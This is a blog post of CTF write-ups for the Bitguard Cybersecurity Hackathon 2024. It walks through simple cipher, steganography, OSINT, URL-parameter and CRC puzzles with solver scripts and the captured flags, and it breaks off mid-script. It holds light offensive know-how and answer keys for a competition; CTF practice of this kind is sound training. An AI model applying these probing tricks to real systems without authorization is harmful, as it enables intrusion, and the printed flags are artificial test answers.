<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="I recently participated in a CTF organized by Mercer | mettl. The CTF was for 2 weeks and had a total of 20 challenges. I was able to solve 19 of them and secured the first position. The overall level">
<meta property="og:type" content="article">
<meta property="og:title" content="Bitguard Cybersecurity Hackathon 2024 Writeups">
<meta property="og:url" content="https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/">
<meta property="og:site_name" content="0xkn1gh7&#39;s Blog">
<meta property="og:description" content="I recently participated in a CTF organized by Mercer | mettl. The CTF was for 2 weeks and had a total of 20 challenges. I was able to solve 19 of them and secured the first position. The overall level">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-06-20T06:25:10.000Z">
<meta property="article:modified_time" content="2024-06-20T06:32:47.039Z">
<meta property="article:author" content="Yuval Goyal">
<meta name="twitter:card" content="summary">
    
    
      
        
          
            <link rel="shortcut icon" href="https://www.gravatar.com/avatar/1060127a70ccb9bcc17b4edf216ad185?s=48">
          
        
      
      
        
          
            <link rel="icon" type="image/png" href="https://www.gravatar.com/avatar/1060127a70ccb9bcc17b4edf216ad185?s=192" sizes="192x192">
          
        
      
      
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="https://www.gravatar.com/avatar/1060127a70ccb9bcc17b4edf216ad185?s=180">
          
        
      
    
    <!-- title -->
    <title>Bitguard Cybersecurity Hackathon 2024 Writeups</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 7.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/0xkn1gh7">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&text=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&is_video=false&description=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Bitguard Cybersecurity Hackathon 2024 Writeups&body=Check out this article: https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&name=Bitguard Cybersecurity Hackathon 2024 Writeups&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&t=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-1-Introduction"><span class="toc-number">1.</span> <span class="toc-text">Challenge-1: Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-2-Tic-Tac-Toe"><span class="toc-number">2.</span> <span class="toc-text">Challenge-2: Tic Tac Toe</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-3-Connect-4"><span class="toc-number">3.</span> <span class="toc-text">Challenge-3: Connect 4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-4-Brute-ME"><span class="toc-number">4.</span> <span class="toc-text">Challenge-4: Brute ME</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-5-Android"><span class="toc-number">5.</span> <span class="toc-text">Challenge-5: Android</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-6-ICANN"><span class="toc-number">6.</span> <span class="toc-text">Challenge-6: ICANN</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-7-Google"><span class="toc-number">7.</span> <span class="toc-text">Challenge-7: Google</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-8-i-Robot"><span class="toc-number">8.</span> <span class="toc-text">Challenge-8: i-Robot</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-9-BrainDuck"><span class="toc-number">9.</span> <span class="toc-text">Challenge-9: BrainDuck</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-10-URL"><span class="toc-number">10.</span> <span class="toc-text">Challenge-10: URL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-11-Country"><span class="toc-number">11.</span> <span class="toc-text">Challenge-11: Country</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-12-Maybach-Shenanigans"><span class="toc-number">12.</span> <span class="toc-text">Challenge-12: Maybach Shenanigans</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-13-QR-Code"><span class="toc-number">13.</span> <span class="toc-text">Challenge-13: QR Code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-14-GPay-or-OpSec"><span class="toc-number">14.</span> <span class="toc-text">Challenge-14: GPay or OpSec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-15-Confusion"><span class="toc-number">15.</span> <span class="toc-text">Challenge-15: Confusion</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-16-Dr-Strange"><span class="toc-number">16.</span> <span class="toc-text">Challenge-16: Dr. Strange</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-17-Tor"><span class="toc-number">17.</span> <span class="toc-text">Challenge-17: Tor</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-18-Rule-Breaker"><span class="toc-number">18.</span> <span class="toc-text">Challenge-18: Rule Breaker</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-19-S3"><span class="toc-number">19.</span> <span class="toc-text">Challenge-19: S3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-20-You-vs-JWT"><span class="toc-number">20.</span> <span class="toc-text">Challenge-20: You vs JWT</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Bitguard Cybersecurity Hackathon 2024 Writeups
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Yuval Goyal</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-06-20T06:25:10.000Z" class="dt-published" itemprop="datePublished">2024-06-20</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CTF-Writeup/">CTF Writeup</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>I recently participated in a CTF organized by Mercer | mettl. The CTF was for 2 weeks and had a total of 20 challenges. I was able to solve 19 of them and secured the first position. The overall level of the CTF was beginner to intermediate and I learnt some new things also.</p>
<h2 id="Challenge-1-Introduction"><a href="#Challenge-1-Introduction" class="headerlink" title="Challenge-1: Introduction"></a>Challenge-1: Introduction</h2><p>This was a simple sanity challenge. The flag was given in plaintext on the <a target="_blank" rel="noopener" href="https://mettl-bitguard-cybersecurity-hackathon.s3.us-east-2.amazonaws.com/intro.html">linked website</a>.</p>
<p><code>FLAG: lag&#123;this_is_an_example_flag&#125;</code></p>
<h2 id="Challenge-2-Tic-Tac-Toe"><a href="#Challenge-2-Tic-Tac-Toe" class="headerlink" title="Challenge-2: Tic Tac Toe"></a>Challenge-2: Tic Tac Toe</h2><p>I went ahead to view the source of the page and found the following javascript code snippet</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Function to encrypt the flag</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">encryptFlag</span>(<span class="params">flag</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> encryptedFlag = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; flag.<span class="property">length</span>; i++) &#123;</span><br><span class="line">        <span class="keyword">let</span> charCode = flag.<span class="title function_">charCodeAt</span>(i);</span><br><span class="line">        encryptedFlag += <span class="title class_">String</span>.<span class="title function_">fromCharCode</span>(charCode + <span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> encryptedFlag;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> encryptedFlag = <span class="string">&quot;Gmbh|YPY`YPY`YPY`jt`fbtz~&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>Clearly this was a simple function which took the original flag and shifted each character by increasing its ascii value by 1.<br>I quickly opened a python shell to reverse it and got the flag.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>enc = <span class="string">&quot;Gmbh|YPY`YPY`YPY`jt`fbtz~&quot;</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.join(<span class="built_in">chr</span>(<span class="built_in">ord</span>(i)-<span class="number">1</span>) <span class="keyword">for</span> i <span class="keyword">in</span> enc)</span><br><span class="line"><span class="string">&#x27;Flag&#123;XOX_XOX_XOX_is_easy&#125;&#x27;</span></span><br></pre></td></tr></table></figure>
<p><code>FLAG: Flag&#123;XOX_XOX_XOX_is_easy&#125;</code></p>
<h2 id="Challenge-3-Connect-4"><a href="#Challenge-3-Connect-4" class="headerlink" title="Challenge-3: Connect 4"></a>Challenge-3: Connect 4</h2><p>This challenge was exactly similiar to the Challenge-2. Only the encrypted string was different.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>enc = <span class="string">&quot;Gmbh|DPOOFDU`NZ`%`GPSDF~&quot;</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="string">&quot;&quot;</span>.join(<span class="built_in">chr</span>(<span class="built_in">ord</span>(i)-<span class="number">1</span>) <span class="keyword">for</span> i <span class="keyword">in</span> enc)</span><br><span class="line"><span class="string">&#x27;Flag&#123;CONNECT_MY_$_FORCE&#125;&#x27;</span></span><br></pre></td></tr></table></figure>
<p><code>FLAG: Flag&#123;CONNECT_MY_$_FORCE&#125;</code></p>
<h2 id="Challenge-4-Brute-ME"><a href="#Challenge-4-Brute-ME" class="headerlink" title="Challenge-4: Brute ME"></a>Challenge-4: Brute ME</h2><p>Although the name suggested that the login had to be bruteforced, having no other information about the target I was reluctanct to do it as rockyou.txt contains 14 million passwords and even the username lists would contain  a few thousand. So I went on to ahead the source code - and what do you know? The flag was there in plainsight.</p>
<p><code>FLAG: Flag&#123;Dolphin_is_not_the_password&#125;</code></p>
<h2 id="Challenge-5-Android"><a href="#Challenge-5-Android" class="headerlink" title="Challenge-5: Android"></a>Challenge-5: Android</h2><p>This was new to me. However, a quick google search gave me a <a target="_blank" rel="noopener" href="https://stackoverflow.com/a/28051161">stackoverflow link</a>. I used the command and found the flag in the alias name.<br><code>COMMAND: keytool -list -v -keystore key.jks</code></p>
<p><code>FLAG: flag&#123;apk_is_mine&#125;</code></p>
<h2 id="Challenge-6-ICANN"><a href="#Challenge-6-ICANN" class="headerlink" title="Challenge-6: ICANN"></a>Challenge-6: ICANN</h2><p>The description stated TXT. My immediate thought was the TXT record of some domain. My first try was the domain on which the challenges were hosted. I used <a target="_blank" rel="noopener" href="https://www.nslookup.io/txt-lookup/">nslookup.io</a> to find the TXT record and found the flag.</p>
<p><code>FLAG: Flag&#123;WHAT??_this_is_my_DNS&#125;</code></p>
<h2 id="Challenge-7-Google"><a href="#Challenge-7-Google" class="headerlink" title="Challenge-7: Google"></a>Challenge-7: Google</h2><p>Unable to solve this. However I am pretty sure that changing the User-Agent string to “Googlebot” should work and its probably an error on the organizer’s side.</p>
<h2 id="Challenge-8-i-Robot"><a href="#Challenge-8-i-Robot" class="headerlink" title="Challenge-8: i-Robot"></a>Challenge-8: i-Robot</h2><p>The name said it all. Went ahead to the <a target="_blank" rel="noopener" href="http://bitguard-env.eba-e5jrkwaj.ap-south-1.elasticbeanstalk.com/human">url</a> and went to <code>/robots.txt</code> endpoint. From there went ahead to <code>/what-about-my-flag-i-am-a-human</code> endpoint. The captcha image was not being rendered properly so I used python to make a request and get the image from <code>/captcha</code> endpoint. However, the rendering issue is fixed now so simply entering the captcha works.</p>
<p><code>FLAG: Flag&#123;You_are_a_Noble_HUMAN&#125;</code></p>
<h2 id="Challenge-9-BrainDuck"><a href="#Challenge-9-BrainDuck" class="headerlink" title="Challenge-9: BrainDuck"></a>Challenge-9: BrainDuck</h2><p>Used the BrainF*ck compiler from <a target="_blank" rel="noopener" href="https://www.dcode.fr/brainfuck-language">dcode.fr</a> to get the flag.</p>
<p><code>FLAG: Flag&#123;Brain_Duck_WTF&#125;</code></p>
<h2 id="Challenge-10-URL"><a href="#Challenge-10-URL" class="headerlink" title="Challenge-10: URL"></a>Challenge-10: URL</h2><p>The <code>page=3</code> parameter immediately caught my eye. I tried changing a few parameters and <code>page=0</code> worked.</p>
<p><code>FLAG: Flag&#123;ZERO_based_indexing&#125;</code></p>
<h2 id="Challenge-11-Country"><a href="#Challenge-11-Country" class="headerlink" title="Challenge-11: Country"></a>Challenge-11: Country</h2><p>I put the hash on Virus total and in the <a target="_blank" rel="noopener" href="https://www.virustotal.com/gui/file/129f0947a54c1f77f776da144babce4736184bf2d2972ef1aa2e7f22491ded05/relations">relations tab</a> saw the url it connected to. Looked up the domain and it was an Indian tourist website. So I tried the flag with country as India and it worked.</p>
<p><code>FLAG: flag&#123;india&#125;</code></p>
<h2 id="Challenge-12-Maybach-Shenanigans"><a href="#Challenge-12-Maybach-Shenanigans" class="headerlink" title="Challenge-12: Maybach Shenanigans"></a>Challenge-12: Maybach Shenanigans</h2><p>The file was a png file. I didn’t find anything with basic tools like strings, exiftool, binwalk. So I decided to use zsteg for looking for lsb and I found a string.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">B0sfERwRMA9DMxdLCgEAHgUDDBcX\n\naHR0cHM6Ly9tZXR0bC1iaXRndWFyZC1jeWJlcnNlY3VyaXR5LWhhY2thdGhvbi5zMy51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9lbmNyeXB0LnB5</span><br></pre></td></tr></table></figure>
<p>I saw the 2 \n and removed them after adding new lines. The string after the \n turned out to be a base64 encoded <a target="_blank" rel="noopener" href="https://mettl-bitguard-cybersecurity-hackathon.s3.us-east-2.amazonaws.com/encrypt.py">URL</a>. I downloaded the encrypt.py file and this was the code</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> cycle</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">xor_encrypt</span>(<span class="params">text, key</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join(<span class="built_in">chr</span>(<span class="built_in">ord</span>(c) ^ <span class="built_in">ord</span>(k)) <span class="keyword">for</span> c, k <span class="keyword">in</span> <span class="built_in">zip</span>(text, cycle(key)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">transpose</span>(<span class="params">text, step</span>):</span><br><span class="line">    <span class="keyword">return</span> text[step:] + text[:step]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt</span>(<span class="params">plaintext, key, step</span>):</span><br><span class="line">    xor_result = xor_encrypt(plaintext, key)</span><br><span class="line">    </span><br><span class="line">    transposed_result = transpose(xor_result, step)</span><br><span class="line">    </span><br><span class="line">    encoded_result = base64.b64encode(transposed_result.encode()).decode()</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> encoded_result</span><br><span class="line"></span><br><span class="line"><span class="comment"># Example usage</span></span><br><span class="line">plaintext = <span class="string">&quot;This is a secret message&quot;</span></span><br><span class="line">key = <span class="string">&quot;complexkey&quot;</span>  <span class="comment">#this is the key used for encryption even for the challenge, and not just for this example</span></span><br><span class="line">step = <span class="number">5</span> </span><br><span class="line"></span><br><span class="line">encrypted_message = encrypt(plaintext, key, step)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Encrypted message:&quot;</span>, encrypted_message)</span><br></pre></td></tr></table></figure>
<p>It was easy to reverse this as this was just simple XORing with the key and then slicing and shifting it. I quickly wrote a script to decrypt it and assumed that the first string in the original string would be the encrypted string. I got the flag from running the below script.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> cycle</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">xor_decrypt</span>(<span class="params">text, key</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join(<span class="built_in">chr</span>(<span class="built_in">ord</span>(c) ^ <span class="built_in">ord</span>(k)) <span class="keyword">for</span> c, k <span class="keyword">in</span> <span class="built_in">zip</span>(text, cycle(key)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt</span>(<span class="params">ciphertext, key, step</span>):</span><br><span class="line">    decoded_result = base64.b64decode(ciphertext.encode()).decode()</span><br><span class="line">    transposed_result = decoded_result[-step:] + decoded_result[:-step]</span><br><span class="line">    decrypted_result = xor_decrypt(transposed_result, key)</span><br><span class="line">    <span class="keyword">return</span> decrypted_result</span><br><span class="line"></span><br><span class="line">ciphertext = <span class="string">&quot;B0sfERwRMA9DMxdLCgEAHgUDDBcX&quot;</span></span><br><span class="line">key = <span class="string">&quot;complexkey&quot;</span></span><br><span class="line">step = <span class="number">5</span></span><br><span class="line"></span><br><span class="line">decrypted_message = decrypt(ciphertext, key, step)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;FLAG:&quot;</span>, decrypted_message)</span><br></pre></td></tr></table></figure>
<p><code>FLAG: flag&#123;b3tter_b3_r3ady&#125;</code></p>
<h2 id="Challenge-13-QR-Code"><a href="#Challenge-13-QR-Code" class="headerlink" title="Challenge-13: QR Code"></a>Challenge-13: QR Code</h2><p>The imgur mention and the code <code>87yIb4q</code> was enough to know that I have to go to some endpoint on imgur. I went to imgur, opened a random image and saw the endpoint. It is of the form <code>https://i.imgur.com/&lt;image id&gt;.jpeg</code>. I quickly put the image id and got the image from <a target="_blank" rel="noopener" href="https://imgur.com/87yIb4q">there</a>. Scanned the QR code, got the <a target="_blank" rel="noopener" href="https://mettl-bitguard-cybersecurity-hackathon.s3.us-east-2.amazonaws.com/Flag.png">link</a> for the flag.</p>
<p><code>FLAG: Flag&#123;aGVsbG8gd29ybGQ=&#125;</code></p>
<h2 id="Challenge-14-GPay-or-OpSec"><a href="#Challenge-14-GPay-or-OpSec" class="headerlink" title="Challenge-14: GPay or OpSec"></a>Challenge-14: GPay or OpSec</h2><p>The user <code>Joachim Odoacer</code> was given. I quickly searched him on popular social media and found an id with a qr code posted on instagram. There was also a base64 encoded string in bio of the user (which was basically a fake flag). The qr code lead to an audio file <a target="_blank" rel="noopener" href="https://mettl-bitguard-cybersecurity-hackathon.s3.us-east-2.amazonaws.com/gpay-2.mp3">url</a>. Considering myself decently experienced in steganography I immediately started looking for common mp3 steganograhy. However, to my disappointment I didn’t find anything.<br>The next day I googled for mp3 specific steganography tools where I came across <a target="_blank" rel="noopener" href="https://www.stegonaut.com/">stegonaut</a>. This surprisingly gave me a base64 encoded string on putting the audio.<br><code>YClGL4hCYd+lAXjITDQT7stRmEc8pf3m+FaBURCCUpY=</code><br>This however on decoding gave gibberish which looked like an AES encoding. I looked for the key at a lot of places but didn’t find anything. Finally, a hint was released which had the key - <code>4lw4ys_4ctiv4t3d_n3v3r_tr4c34bl3</code>.<br>I used the key with <a target="_blank" rel="noopener" href="https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Base64','string':'NGx3NHlzXzRjdGl2NHQzZF9uM3Yzcl90cjRjMzRibDM%3D'%7D,%7B'option':'Hex','string':''%7D,'ECB','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=YClGL4hCYd%2BlAXjITDQT7stRmEc8pf3m%2BFaBURCCUpY">AES ECB</a> to decrypt the text and got the flag.</p>
<p><code>FLAG: flag&#123;sn0wd3n_is_happy&#125;</code></p>
<h2 id="Challenge-15-Confusion"><a href="#Challenge-15-Confusion" class="headerlink" title="Challenge-15: Confusion"></a>Challenge-15: Confusion</h2><p>I had no idea of what CRC was and how it worked so I left this chall for the end. When I came back I decided to go through a few articles based on CRC. The wikipedia article was really good and it became obvious that I just had to bruteforce the polynomial (the character of the flag in this case) which were only 127 values. So I wrote a script that did that and combined the result of the three files to remove the errors. The script printed the flag for me.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># poly_size = 8 bit</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">crc</span>(<span class="params">message, poly</span>):</span><br><span class="line">    p = <span class="string">f&#x27;1<span class="subst">&#123;poly:08b&#125;</span>&#x27;</span></span><br><span class="line">    tmes = <span class="built_in">list</span>(message + <span class="string">&#x27;0&#x27;</span>*<span class="number">8</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(message)):</span><br><span class="line">        <span class="keyword">if</span> tmes[i] == <span class="string">&#x27;1&#x27;</span>:</span><br><span class="line">            tmes[i] = <span class="string">&#x27;0&#x27;</span></span><br><span class="line">            <span class="keyword">for</span> d <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">9</span>):</span><br><span class="line">                <span class="keyword">if</span> p[d] == <span class="string">&#x27;1&#x27;</span>:</span><br><span class="line">                    tmes[i+d] = <span class="string">f&#x27;<span class="subst">&#123;<span class="number">1</span>-<span class="built_in">int</span>(tmes[i+d])&#125;</span>&#x27;</span></span><br><span class="line">                </span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join(tmes[-<span class="number">8</span>:])</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_possible</span>(<span class="params">file</span>):</span><br><span class="line">    A = []</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(file) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> f.readlines():</span><br><span class="line">            a,r = i.strip().split(<span class="string">&#x27; --&gt; &#x27;</span>)</span><br><span class="line">            A.append((a,r))</span><br><span class="line">            <span class="comment"># A[a] = r</span></span><br><span class="line"></span><br><span class="line">    poss = []</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i,j <span class="keyword">in</span> A:</span><br><span class="line">        corr = 